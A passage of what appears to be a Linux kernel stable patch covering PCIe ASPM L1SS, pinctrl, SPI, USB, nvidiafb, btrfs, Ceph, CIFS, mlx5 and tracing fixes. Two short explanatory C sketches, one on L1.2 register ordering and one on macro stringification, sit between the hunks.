++	pci_write_config_dword(child, child->l1ss + PCI_L1SS_CTL2, ctl2);
++
++	/* Program Common_Mode_Restore_Time in upstream device */
++	pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_CM_RESTORE_TIME, ctl1);
++
++	/* Program LTR_L1.2_THRESHOLD time in both ports */
++	pci_clear_and_set_dword(parent,	parent->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
++				PCI_L1SS_CTL1_LTR_L12_TH_SCALE, ctl1);
++	pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
++				PCI_L1SS_CTL1_LTR_L12_TH_SCALE, ctl1);
++
++	if (pl1_2_enables || cl1_2_enables) {
++		pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1, 0,
++					pl1_2_enables);
++		pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1, 0,
++					cl1_2_enables);
++	}
+ }
+ 
+ static void aspm_l1ss_init(struct pcie_link_state *link)
+@@ -757,43 +751,6 @@ static void pcie_config_aspm_l1ss(struct pcie_link_state *link, u32 state)
+ 				PCI_L1SS_CTL1_L1SS_MASK, val);
+ }
+ 
+-void pci_save_aspm_l1ss_state(struct pci_dev *dev)
+-{
+-	struct pci_cap_saved_state *save_state;
+-	u16 l1ss = dev->l1ss;
+-	u32 *cap;
+-
+-	if (!l1ss)
+-		return;
+-
+-	save_state = pci_find_saved_ext_cap(dev, PCI_EXT_CAP_ID_L1SS);
+-	if (!save_state)
+-		return;
+-
+-	cap = (u32 *)&save_state->cap.data[0];
+-	pci_read_config_dword(dev, l1ss + PCI_L1SS_CTL2, cap++);
+-	pci_read_config_dword(dev, l1ss + PCI_L1SS_CTL1, cap++);
+-}
+-
+-void pci_restore_aspm_l1ss_state(struct pci_dev *dev)
+-{
+-	struct pci_cap_saved_state *save_state;
+-	u32 *cap, ctl1, ctl2;
+-	u16 l1ss = dev->l1ss;
+-
+-	if (!l1ss)
+-		return;
+-
+-	save_state = pci_find_saved_ext_cap(dev, PCI_EXT_CAP_ID_L1SS);
+-	if (!save_state)
+-		return;
+-
+-	cap = (u32 *)&save_state->cap.data[0];
+-	ctl2 = *cap++;
+-	ctl1 = *cap;
+-	aspm_program_l1ss(dev, ctl1, ctl2);
+-}
+-
+ static void pcie_config_aspm_dev(struct pci_dev *pdev, u32 val)
+ {
+ 	pcie_capability_clear_and_set_word(pdev, PCI_EXP_LNKCTL,
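The rewritten sequence above follows the ordering rule in PCIe r5.0 sec 5.5.4: the L1.2 enable bits must be clear while T_POWER_ON, Common_Mode_Restore_Time and the LTR_L1.2_THRESHOLD fields are reprogrammed, and may only be set again afterwards. A condensed sketch of that order against a fake config space (clear_set() is a stand-in helper, not a real PCI API, and the register values are invented):

#include <stdint.h>
#include <stdio.h>

#define L1SS_CTL1	0x08
#define L1SS_CTL2	0x0c
#define L1_2_MASK	0x00000005	/* ASPM + PCI-PM L1.2 enables */

static uint32_t cfg[16];	/* fake config space, dword indexed */

static void clear_set(int off, uint32_t clear, uint32_t set)
{
	cfg[off / 4] = (cfg[off / 4] & ~clear) | set;
}

int main(void)
{
	uint32_t ctl1 = 0x40a0c205, ctl2 = 0x00000028;
	uint32_t enables = ctl1 & L1_2_MASK;

	clear_set(L1SS_CTL1, L1_2_MASK, 0);	/* 1. disable L1.2 first   */
	cfg[L1SS_CTL2 / 4] = ctl2;		/* 2. T_POWER_ON           */
	clear_set(L1SS_CTL1, ~L1_2_MASK,	/* 3. restore time + LTR   */
		  ctl1 & ~L1_2_MASK);
	clear_set(L1SS_CTL1, 0, enables);	/* 4. re-enable L1.2 last  */

	printf("CTL1=%08x CTL2=%08x\n",
	       cfg[L1SS_CTL1 / 4], cfg[L1SS_CTL2 / 4]);
	return 0;
}
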
+diff --git a/drivers/pinctrl/aspeed/pinctrl-aspeed.c b/drivers/pinctrl/aspeed/pinctrl-aspeed.c
+index a30912a92f057..5a12fc7cf91fb 100644
+--- a/drivers/pinctrl/aspeed/pinctrl-aspeed.c
++++ b/drivers/pinctrl/aspeed/pinctrl-aspeed.c
+@@ -92,10 +92,19 @@ static int aspeed_sig_expr_enable(struct aspeed_pinmux_data *ctx,
+ static int aspeed_sig_expr_disable(struct aspeed_pinmux_data *ctx,
+ 				   const struct aspeed_sig_expr *expr)
+ {
++	int ret;
++
+ 	pr_debug("Disabling signal %s for %s\n", expr->signal,
+ 		 expr->function);
+ 
+-	return aspeed_sig_expr_set(ctx, expr, false);
++	ret = aspeed_sig_expr_eval(ctx, expr, true);
++	if (ret < 0)
++		return ret;
++
++	if (ret)
++		return aspeed_sig_expr_set(ctx, expr, false);
++
++	return 0;
+ }
+ 
+ /**
+@@ -113,7 +122,7 @@ static int aspeed_disable_sig(struct aspeed_pinmux_data *ctx,
+ 	int ret = 0;
+ 
+ 	if (!exprs)
+-		return true;
++		return -EINVAL;
+ 
+ 	while (*exprs && !ret) {
+ 		ret = aspeed_sig_expr_disable(ctx, *exprs);
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.c b/drivers/pinctrl/intel/pinctrl-intel.c
+index 047a8374b4fdc..954a412267402 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.c
++++ b/drivers/pinctrl/intel/pinctrl-intel.c
+@@ -1676,6 +1676,12 @@ const struct intel_pinctrl_soc_data *intel_pinctrl_get_soc_data(struct platform_
+ EXPORT_SYMBOL_GPL(intel_pinctrl_get_soc_data);
+ 
+ #ifdef CONFIG_PM_SLEEP
++static bool __intel_gpio_is_direct_irq(u32 value)
++{
++	return (value & PADCFG0_GPIROUTIOXAPIC) && (value & PADCFG0_GPIOTXDIS) &&
++	       (__intel_gpio_get_gpio_mode(value) == PADCFG0_PMODE_GPIO);
++}
++
+ static bool intel_pinctrl_should_save(struct intel_pinctrl *pctrl, unsigned int pin)
+ {
+ 	const struct pin_desc *pd = pin_desc_get(pctrl->pctldev, pin);
+@@ -1709,8 +1715,7 @@ static bool intel_pinctrl_should_save(struct intel_pinctrl *pctrl, unsigned int
+ 	 * See https://bugzilla.kernel.org/show_bug.cgi?id=214749.
+ 	 */
+ 	value = readl(intel_get_padcfg(pctrl, pin, PADCFG0));
+-	if ((value & PADCFG0_GPIROUTIOXAPIC) && (value & PADCFG0_GPIOTXDIS) &&
+-	    (__intel_gpio_get_gpio_mode(value) == PADCFG0_PMODE_GPIO))
++	if (__intel_gpio_is_direct_irq(value))
+ 		return true;
+ 
+ 	return false;
+@@ -1840,7 +1845,12 @@ int intel_pinctrl_resume_noirq(struct device *dev)
+ 	for (i = 0; i < pctrl->soc->npins; i++) {
+ 		const struct pinctrl_pin_desc *desc = &pctrl->soc->pins[i];
+ 
+-		if (!intel_pinctrl_should_save(pctrl, desc->number))
++		if (!(intel_pinctrl_should_save(pctrl, desc->number) ||
++		      /*
++		       * If the firmware mangled the register contents too much,
++		       * check the saved value for the Direct IRQ mode.
++		       */
++		      __intel_gpio_is_direct_irq(pads[i].padcfg0)))
+ 			continue;
+ 
+ 		intel_restore_padcfg(pctrl, desc->number, PADCFG0, pads[i].padcfg0);
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8195.c b/drivers/pinctrl/mediatek/pinctrl-mt8195.c
+index 89557c7ed2ab0..09c4dcef93383 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8195.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8195.c
+@@ -659,7 +659,7 @@ static const struct mtk_pin_field_calc mt8195_pin_drv_range[] = {
+ 	PIN_FIELD_BASE(10, 10, 4, 0x010, 0x10, 9, 3),
+ 	PIN_FIELD_BASE(11, 11, 4, 0x000, 0x10, 24, 3),
+ 	PIN_FIELD_BASE(12, 12, 4, 0x010, 0x10, 12, 3),
+-	PIN_FIELD_BASE(13, 13, 4, 0x010, 0x10, 27, 3),
++	PIN_FIELD_BASE(13, 13, 4, 0x000, 0x10, 27, 3),
+ 	PIN_FIELD_BASE(14, 14, 4, 0x010, 0x10, 15, 3),
+ 	PIN_FIELD_BASE(15, 15, 4, 0x010, 0x10, 0, 3),
+ 	PIN_FIELD_BASE(16, 16, 4, 0x010, 0x10, 18, 3),
+@@ -708,7 +708,7 @@ static const struct mtk_pin_field_calc mt8195_pin_drv_range[] = {
+ 	PIN_FIELD_BASE(78, 78, 3, 0x000, 0x10, 15, 3),
+ 	PIN_FIELD_BASE(79, 79, 3, 0x000, 0x10, 18, 3),
+ 	PIN_FIELD_BASE(80, 80, 3, 0x000, 0x10, 21, 3),
+-	PIN_FIELD_BASE(81, 81, 3, 0x000, 0x10, 28, 3),
++	PIN_FIELD_BASE(81, 81, 3, 0x000, 0x10, 24, 3),
+ 	PIN_FIELD_BASE(82, 82, 3, 0x000, 0x10, 27, 3),
+ 	PIN_FIELD_BASE(83, 83, 3, 0x010, 0x10, 0, 3),
+ 	PIN_FIELD_BASE(84, 84, 3, 0x010, 0x10, 3, 3),
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index 414ee6bb8ac98..9ad8f70206142 100644
+--- a/drivers/pinctrl/pinctrl-single.c
++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -372,6 +372,8 @@ static int pcs_set_mux(struct pinctrl_dev *pctldev, unsigned fselector,
+ 	if (!pcs->fmask)
+ 		return 0;
+ 	function = pinmux_generic_get_function(pctldev, fselector);
++	if (!function)
++		return -EINVAL;
+ 	func = function->data;
+ 	if (!func)
+ 		return -EINVAL;
+diff --git a/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
+index c3c8c34148f11..e22d03ce292e7 100644
+--- a/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-sm8450-lpass-lpi.c
+@@ -105,7 +105,7 @@ static const struct pinctrl_pin_desc sm8450_lpi_pins[] = {
+ static const char * const swr_tx_clk_groups[] = { "gpio0" };
+ static const char * const swr_tx_data_groups[] = { "gpio1", "gpio2", "gpio14" };
+ static const char * const swr_rx_clk_groups[] = { "gpio3" };
+-static const char * const swr_rx_data_groups[] = { "gpio4", "gpio5", "gpio15" };
++static const char * const swr_rx_data_groups[] = { "gpio4", "gpio5" };
+ static const char * const dmic1_clk_groups[] = { "gpio6" };
+ static const char * const dmic1_data_groups[] = { "gpio7" };
+ static const char * const dmic2_clk_groups[] = { "gpio8" };
+diff --git a/drivers/spi/spi-dw-core.c b/drivers/spi/spi-dw-core.c
+index 99edddf9958b9..c3bfb6c84cab2 100644
+--- a/drivers/spi/spi-dw-core.c
++++ b/drivers/spi/spi-dw-core.c
+@@ -366,7 +366,7 @@ static void dw_spi_irq_setup(struct dw_spi *dws)
+ 	 * will be adjusted at the final stage of the IRQ-based SPI transfer
+ 	 * execution so not to lose the leftover of the incoming data.
+ 	 */
+-	level = min_t(u16, dws->fifo_len / 2, dws->tx_len);
++	level = min_t(unsigned int, dws->fifo_len / 2, dws->tx_len);
+ 	dw_writel(dws, DW_SPI_TXFTLR, level);
+ 	dw_writel(dws, DW_SPI_RXFTLR, level - 1);
+ 
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 079e183cf3bff..934b3d997702e 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -526,6 +526,9 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 	/* DJI CineSSD */
+ 	{ USB_DEVICE(0x2ca3, 0x0031), .driver_info = USB_QUIRK_NO_LPM },
+ 
++	/* Alcor Link AK9563 SC Reader used in 2022 Lenovo ThinkPads */
++	{ USB_DEVICE(0x2ce3, 0x9563), .driver_info = USB_QUIRK_NO_LPM },
++
+ 	/* DELL USB GEN2 */
+ 	{ USB_DEVICE(0x413c, 0xb062), .driver_info = USB_QUIRK_NO_LPM | USB_QUIRK_RESET_RESUME },
+ 
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 80d8c6c3be369..3a42313d0d66e 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -535,10 +535,10 @@ int dp_altmode_probe(struct typec_altmode *alt)
+ 	/* FIXME: Port can only be DFP_U. */
+ 
+ 	/* Make sure we have compatible pin configurations */
+-	if (!(DP_CAP_DFP_D_PIN_ASSIGN(port->vdo) &
+-	      DP_CAP_UFP_D_PIN_ASSIGN(alt->vdo)) &&
+-	    !(DP_CAP_UFP_D_PIN_ASSIGN(port->vdo) &
+-	      DP_CAP_DFP_D_PIN_ASSIGN(alt->vdo)))
++	if (!(DP_CAP_PIN_ASSIGN_DFP_D(port->vdo) &
++	      DP_CAP_PIN_ASSIGN_UFP_D(alt->vdo)) &&
++	    !(DP_CAP_PIN_ASSIGN_UFP_D(port->vdo) &
++	      DP_CAP_PIN_ASSIGN_DFP_D(alt->vdo)))
+ 		return -ENODEV;
+ 
+ 	ret = sysfs_create_group(&alt->dev.kobj, &dp_altmode_group);
+diff --git a/drivers/video/fbdev/nvidia/nvidia.c b/drivers/video/fbdev/nvidia/nvidia.c
+index 329e2e8133c69..a6c3bc2222463 100644
+--- a/drivers/video/fbdev/nvidia/nvidia.c
++++ b/drivers/video/fbdev/nvidia/nvidia.c
+@@ -1197,17 +1197,17 @@ static int nvidia_set_fbinfo(struct fb_info *info)
+ 	return nvidiafb_check_var(&info->var, info);
+ }
+ 
+-static u32 nvidia_get_chipset(struct fb_info *info)
++static u32 nvidia_get_chipset(struct pci_dev *pci_dev,
++			      volatile u32 __iomem *REGS)
+ {
+-	struct nvidia_par *par = info->par;
+-	u32 id = (par->pci_dev->vendor << 16) | par->pci_dev->device;
++	u32 id = (pci_dev->vendor << 16) | pci_dev->device;
+ 
+ 	printk(KERN_INFO PFX "Device ID: %x \n", id);
+ 
+ 	if ((id & 0xfff0) == 0x00f0 ||
+ 	    (id & 0xfff0) == 0x02e0) {
+ 		/* pci-e */
+-		id = NV_RD32(par->REGS, 0x1800);
++		id = NV_RD32(REGS, 0x1800);
+ 
+ 		if ((id & 0x0000ffff) == 0x000010DE)
+ 			id = 0x10DE0000 | (id >> 16);
+@@ -1220,12 +1220,11 @@ static u32 nvidia_get_chipset(struct fb_info *info)
+ 	return id;
+ }
+ 
+-static u32 nvidia_get_arch(struct fb_info *info)
++static u32 nvidia_get_arch(u32 Chipset)
+ {
+-	struct nvidia_par *par = info->par;
+ 	u32 arch = 0;
+ 
+-	switch (par->Chipset & 0x0ff0) {
++	switch (Chipset & 0x0ff0) {
+ 	case 0x0100:		/* GeForce 256 */
+ 	case 0x0110:		/* GeForce2 MX */
+ 	case 0x0150:		/* GeForce2 */
+@@ -1278,16 +1277,44 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	struct fb_info *info;
+ 	unsigned short cmd;
+ 	int ret;
++	volatile u32 __iomem *REGS;
++	int Chipset;
++	u32 Architecture;
+ 
+ 	NVTRACE_ENTER();
+ 	assert(pd != NULL);
+ 
++	if (pci_enable_device(pd)) {
++		printk(KERN_ERR PFX "cannot enable PCI device\n");
++		return -ENODEV;
++	}
++
++	/* enable IO and mem if not already done */
++	pci_read_config_word(pd, PCI_COMMAND, &cmd);
++	cmd |= (PCI_COMMAND_IO | PCI_COMMAND_MEMORY);
++	pci_write_config_word(pd, PCI_COMMAND, cmd);
++
++	nvidiafb_fix.mmio_start = pci_resource_start(pd, 0);
++	nvidiafb_fix.mmio_len = pci_resource_len(pd, 0);
++
++	REGS = ioremap(nvidiafb_fix.mmio_start, nvidiafb_fix.mmio_len);
++	if (!REGS) {
++		printk(KERN_ERR PFX "cannot ioremap MMIO base\n");
++		return -ENODEV;
++	}
++
++	Chipset = nvidia_get_chipset(pd, REGS);
++	Architecture = nvidia_get_arch(Chipset);
++	if (Architecture == 0) {
++		printk(KERN_ERR PFX "unknown NV_ARCH\n");
++		goto err_out;
++	}
++
+ 	ret = aperture_remove_conflicting_pci_devices(pd, "nvidiafb");
+ 	if (ret)
+-		return ret;
++		goto err_out;
+ 
+ 	info = framebuffer_alloc(sizeof(struct nvidia_par), &pd->dev);
+-
+ 	if (!info)
+ 		goto err_out;
+ 
+@@ -1298,11 +1325,6 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	if (info->pixmap.addr == NULL)
+ 		goto err_out_kfree;
+ 
+-	if (pci_enable_device(pd)) {
+-		printk(KERN_ERR PFX "cannot enable PCI device\n");
+-		goto err_out_enable;
+-	}
+-
+ 	if (pci_request_regions(pd, "nvidiafb")) {
+ 		printk(KERN_ERR PFX "cannot request PCI regions\n");
+ 		goto err_out_enable;
+@@ -1318,34 +1340,17 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 	par->paneltweak = paneltweak;
+ 	par->reverse_i2c = reverse_i2c;
+ 
+-	/* enable IO and mem if not already done */
+-	pci_read_config_word(pd, PCI_COMMAND, &cmd);
+-	cmd |= (PCI_COMMAND_IO | PCI_COMMAND_MEMORY);
+-	pci_write_config_word(pd, PCI_COMMAND, cmd);
+-
+-	nvidiafb_fix.mmio_start = pci_resource_start(pd, 0);
+ 	nvidiafb_fix.smem_start = pci_resource_start(pd, 1);
+-	nvidiafb_fix.mmio_len = pci_resource_len(pd, 0);
+-
+-	par->REGS = ioremap(nvidiafb_fix.mmio_start, nvidiafb_fix.mmio_len);
+ 
+-	if (!par->REGS) {
+-		printk(KERN_ERR PFX "cannot ioremap MMIO base\n");
+-		goto err_out_free_base0;
+-	}
++	par->REGS = REGS;
+ 
+-	par->Chipset = nvidia_get_chipset(info);
+-	par->Architecture = nvidia_get_arch(info);
+-
+-	if (par->Architecture == 0) {
+-		printk(KERN_ERR PFX "unknown NV_ARCH\n");
+-		goto err_out_arch;
+-	}
++	par->Chipset = Chipset;
++	par->Architecture = Architecture;
+ 
+ 	sprintf(nvidiafb_fix.id, "NV%x", (pd->device & 0x0ff0) >> 4);
+ 
+ 	if (NVCommonSetup(info))
+-		goto err_out_arch;
++		goto err_out_free_base0;
+ 
+ 	par->FbAddress = nvidiafb_fix.smem_start;
+ 	par->FbMapSize = par->RamAmountKBytes * 1024;
+@@ -1401,7 +1406,6 @@ static int nvidiafb_probe(struct pci_dev *pd, const struct pci_device_id *ent)
+ 		goto err_out_iounmap_fb;
+ 	}
+ 
+-
+ 	printk(KERN_INFO PFX
+ 	       "PCI nVidia %s framebuffer (%dMB @ 0x%lX)\n",
+ 	       info->fix.id,
+@@ -1415,15 +1419,14 @@ err_out_iounmap_fb:
+ err_out_free_base1:
+ 	fb_destroy_modedb(info->monspecs.modedb);
+ 	nvidia_delete_i2c_busses(par);
+-err_out_arch:
+-	iounmap(par->REGS);
+- err_out_free_base0:
++err_out_free_base0:
+ 	pci_release_regions(pd);
+ err_out_enable:
+ 	kfree(info->pixmap.addr);
+ err_out_kfree:
+ 	framebuffer_release(info);
+ err_out:
++	iounmap(REGS);
+ 	return -ENODEV;
+ }
+ 
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 7535857f4c8fb..e71464c0e4667 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -3607,17 +3607,19 @@ static noinline int insert_dir_log_key(struct btrfs_trans_handle *trans,
+ }
+ 
+ static int flush_dir_items_batch(struct btrfs_trans_handle *trans,
+-				 struct btrfs_root *log,
++				 struct btrfs_inode *inode,
+ 				 struct extent_buffer *src,
+ 				 struct btrfs_path *dst_path,
+ 				 int start_slot,
+ 				 int count)
+ {
++	struct btrfs_root *log = inode->root->log_root;
+ 	char *ins_data = NULL;
+ 	struct btrfs_item_batch batch;
+ 	struct extent_buffer *dst;
+ 	unsigned long src_offset;
+ 	unsigned long dst_offset;
++	u64 last_index;
+ 	struct btrfs_key key;
+ 	u32 item_size;
+ 	int ret;
+@@ -3675,6 +3677,19 @@ static int flush_dir_items_batch(struct btrfs_trans_handle *trans,
+ 	src_offset = btrfs_item_ptr_offset(src, start_slot + count - 1);
+ 	copy_extent_buffer(dst, src, dst_offset, src_offset, batch.total_data_size);
+ 	btrfs_release_path(dst_path);
++
++	last_index = batch.keys[count - 1].offset;
++	ASSERT(last_index > inode->last_dir_index_offset);
++
++	/*
++	 * If for some unexpected reason the last item's index is not greater
++	 * than the last index we logged, warn and return an error to fallback
++	 * to a transaction commit.
++	 */
++	if (WARN_ON(last_index <= inode->last_dir_index_offset))
++		ret = -EUCLEAN;
++	else
++		inode->last_dir_index_offset = last_index;
+ out:
+ 	kfree(ins_data);
+ 
+@@ -3724,7 +3739,6 @@ static int process_dir_items_leaf(struct btrfs_trans_handle *trans,
+ 		}
+ 
+ 		di = btrfs_item_ptr(src, i, struct btrfs_dir_item);
+-		ctx->last_dir_item_offset = key.offset;
+ 
+ 		/*
+ 		 * Skip ranges of items that consist only of dir item keys created
+@@ -3787,7 +3801,7 @@ static int process_dir_items_leaf(struct btrfs_trans_handle *trans,
+ 	if (batch_size > 0) {
+ 		int ret;
+ 
+-		ret = flush_dir_items_batch(trans, log, src, dst_path,
++		ret = flush_dir_items_batch(trans, inode, src, dst_path,
+ 					    batch_start, batch_size);
+ 		if (ret < 0)
+ 			return ret;
+@@ -4075,7 +4089,6 @@ static noinline int log_directory_changes(struct btrfs_trans_handle *trans,
+ 
+ 	min_key = BTRFS_DIR_START_INDEX;
+ 	max_key = 0;
+-	ctx->last_dir_item_offset = inode->last_dir_index_offset;
+ 
+ 	while (1) {
+ 		ret = log_dir_items(trans, inode, path, dst_path,
+@@ -4087,8 +4100,6 @@ static noinline int log_directory_changes(struct btrfs_trans_handle *trans,
+ 		min_key = max_key + 1;
+ 	}
+ 
+-	inode->last_dir_index_offset = ctx->last_dir_item_offset;
+-
+ 	return 0;
+ }
+ 
+diff --git a/fs/btrfs/tree-log.h b/fs/btrfs/tree-log.h
+index aed1e05e9879e..bcca74128c3bb 100644
+--- a/fs/btrfs/tree-log.h
++++ b/fs/btrfs/tree-log.h
+@@ -23,8 +23,6 @@ struct btrfs_log_ctx {
+ 	bool logging_new_delayed_dentries;
+ 	/* Indicate if the inode being logged was logged before. */
+ 	bool logged_before;
+-	/* Tracks the last logged dir item/index key offset. */
+-	u64 last_dir_item_offset;
+ 	struct inode *inode;
+ 	struct list_head list;
+ 	/* Only used for fast fsyncs. */
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 65e4e887605f9..05f9cbbf6e1ef 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -408,6 +408,7 @@ void btrfs_free_device(struct btrfs_device *device)
+ static void free_fs_devices(struct btrfs_fs_devices *fs_devices)
+ {
+ 	struct btrfs_device *device;
++
+ 	WARN_ON(fs_devices->opened);
+ 	while (!list_empty(&fs_devices->devices)) {
+ 		device = list_entry(fs_devices->devices.next,
+@@ -1194,9 +1195,22 @@ void btrfs_close_devices(struct btrfs_fs_devices *fs_devices)
+ 
+ 	mutex_lock(&uuid_mutex);
+ 	close_fs_devices(fs_devices);
+-	if (!fs_devices->opened)
++	if (!fs_devices->opened) {
+ 		list_splice_init(&fs_devices->seed_list, &list);
+ 
++		/*
++		 * If the struct btrfs_fs_devices is not assembled with any
++		 * other device, it can be re-initialized during the next mount
++		 * without the needing device-scan step. Therefore, it can be
++		 * fully freed.
++		 */
++		if (fs_devices->num_devices == 1) {
++			list_del(&fs_devices->fs_list);
++			free_fs_devices(fs_devices);
++		}
++	}
++
++
+ 	list_for_each_entry_safe(fs_devices, tmp, &list, seed_list) {
+ 		close_fs_devices(fs_devices);
+ 		list_del(&fs_devices->seed_list);
+@@ -1612,7 +1626,7 @@ again:
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	while (1) {
++	while (search_start < search_end) {
+ 		l = path->nodes[0];
+ 		slot = path->slots[0];
+ 		if (slot >= btrfs_header_nritems(l)) {
+@@ -1635,6 +1649,9 @@ again:
+ 		if (key.type != BTRFS_DEV_EXTENT_KEY)
+ 			goto next;
+ 
++		if (key.offset > search_end)
++			break;
++
+ 		if (key.offset > search_start) {
+ 			hole_size = key.offset - search_start;
+ 			dev_extent_hole_check(device, &search_start, &hole_size,
+@@ -1695,6 +1712,7 @@ next:
+ 	else
+ 		ret = 0;
+ 
++	ASSERT(max_hole_start + max_hole_size <= search_end);
+ out:
+ 	btrfs_free_path(path);
+ 	*start = max_hole_start;
+diff --git a/fs/btrfs/zlib.c b/fs/btrfs/zlib.c
+index b4f44662cda7c..94d06a76edb17 100644
+--- a/fs/btrfs/zlib.c
++++ b/fs/btrfs/zlib.c
+@@ -63,7 +63,7 @@ struct list_head *zlib_alloc_workspace(unsigned int level)
+ 
+ 	workspacesize = max(zlib_deflate_workspacesize(MAX_WBITS, MAX_MEM_LEVEL),
+ 			zlib_inflate_workspacesize());
+-	workspace->strm.workspace = kvmalloc(workspacesize, GFP_KERNEL);
++	workspace->strm.workspace = kvzalloc(workspacesize, GFP_KERNEL);
+ 	workspace->level = level;
+ 	workspace->buf = NULL;
+ 	/*
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 26a0a8b9975ef..756560df3bdbd 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3662,6 +3662,12 @@ static void handle_session(struct ceph_mds_session *session,
+ 		break;
+ 
+ 	case CEPH_SESSION_FLUSHMSG:
++		/* flush cap releases */
++		spin_lock(&session->s_cap_lock);
++		if (session->s_num_cap_releases)
++			ceph_flush_cap_releases(mdsc, session);
++		spin_unlock(&session->s_cap_lock);
++
+ 		send_flushmsg_ack(mdsc, session, seq);
+ 		break;
+ 
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 209dfc06fd6d1..542f22db5f46f 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -3880,7 +3880,7 @@ uncached_fill_pages(struct TCP_Server_Info *server,
+ 		rdata->got_bytes += result;
+ 	}
+ 
+-	return rdata->got_bytes > 0 && result != -ECONNABORTED ?
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+ 						rdata->got_bytes : result;
+ }
+ 
+@@ -4656,7 +4656,7 @@ readpages_fill_pages(struct TCP_Server_Info *server,
+ 		rdata->got_bytes += result;
+ 	}
+ 
+-	return rdata->got_bytes > 0 && result != -ECONNABORTED ?
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+ 						rdata->got_bytes : result;
+ }
+ 
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index ad55470a9fb97..fff61e6d6d4de 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -573,6 +573,14 @@ struct mlx5_debugfs_entries {
+ 	struct dentry *lag_debugfs;
+ };
+ 
++enum mlx5_func_type {
++	MLX5_PF,
++	MLX5_VF,
++	MLX5_SF,
++	MLX5_HOST_PF,
++	MLX5_FUNC_TYPE_NUM,
++};
++
+ struct mlx5_ft_pool;
+ struct mlx5_priv {
+ 	/* IRQ table valid only for real pci devices PF or VF */
+@@ -583,11 +591,10 @@ struct mlx5_priv {
+ 	struct mlx5_nb          pg_nb;
+ 	struct workqueue_struct *pg_wq;
+ 	struct xarray           page_root_xa;
+-	u32			fw_pages;
+ 	atomic_t		reg_pages;
+ 	struct list_head	free_list;
+-	u32			vfs_pages;
+-	u32			host_pf_pages;
++	u32			fw_pages;
++	u32			page_counters[MLX5_FUNC_TYPE_NUM];
+ 	u32			fw_pages_alloc_failed;
+ 	u32			give_pages_dropped;
+ 	u32			reclaim_pages_discard;
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 20749bd9db718..04c59f8d801f1 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -270,6 +270,7 @@ struct trace_event_fields {
+ 			const int  align;
+ 			const int  is_signed;
+ 			const int  filter_type;
++			const int  len;
+ 		};
+ 		int (*define_fields)(struct trace_event_call *);
+ 	};
+diff --git a/include/trace/stages/stage4_event_fields.h b/include/trace/stages/stage4_event_fields.h
+index a8fb25f39a99d..fae467ccd0c3c 100644
+--- a/include/trace/stages/stage4_event_fields.h
++++ b/include/trace/stages/stage4_event_fields.h
+@@ -26,7 +26,8 @@
+ #define __array(_type, _item, _len) {					\
+ 	.type = #_type"["__stringify(_len)"]", .name = #_item,		\
+ 	.size = sizeof(_type[_len]), .align = ALIGN_STRUCTFIELD(_type),	\
+-	.is_signed = is_signed_type(_type), .filter_type = FILTER_OTHER },
++	.is_signed = is_signed_type(_type), .filter_type = FILTER_OTHER,\
++	.len = _len },
+ 
+ #undef __dynamic_array
+ #define __dynamic_array(_type, _item, _len) {				\
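For reference, the .type string next to the new .len member is built purely by the preprocessor: #_type"["__stringify(_len)"]" stringifies the element type and the length and pastes them into one literal such as "int[4]". That part can be checked in isolation:

#include <stdio.h>

#define __stringify_1(x)	#x
#define __stringify(x)		__stringify_1(x)

/* Mirrors the .type initializer in __array(): stringify the element
 * type and the length, then paste them into one string literal. */
#define ARRAY_TYPE_STR(_type, _len)	#_type "[" __stringify(_len) "]"

int main(void)
{
	printf("%s\n", ARRAY_TYPE_STR(int, 4));		   /* int[4] */
	printf("%s\n", ARRAY_TYPE_STR(unsigned char, 16)); /* unsigned char[16] */
	return 0;
}
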
+diff --git a/include/uapi/drm/virtgpu_drm.h b/include/uapi/drm/virtgpu_drm.h
+index 0512fde5e6978..7b158fcb02b45 100644
+--- a/include/uapi/drm/virtgpu_drm.h
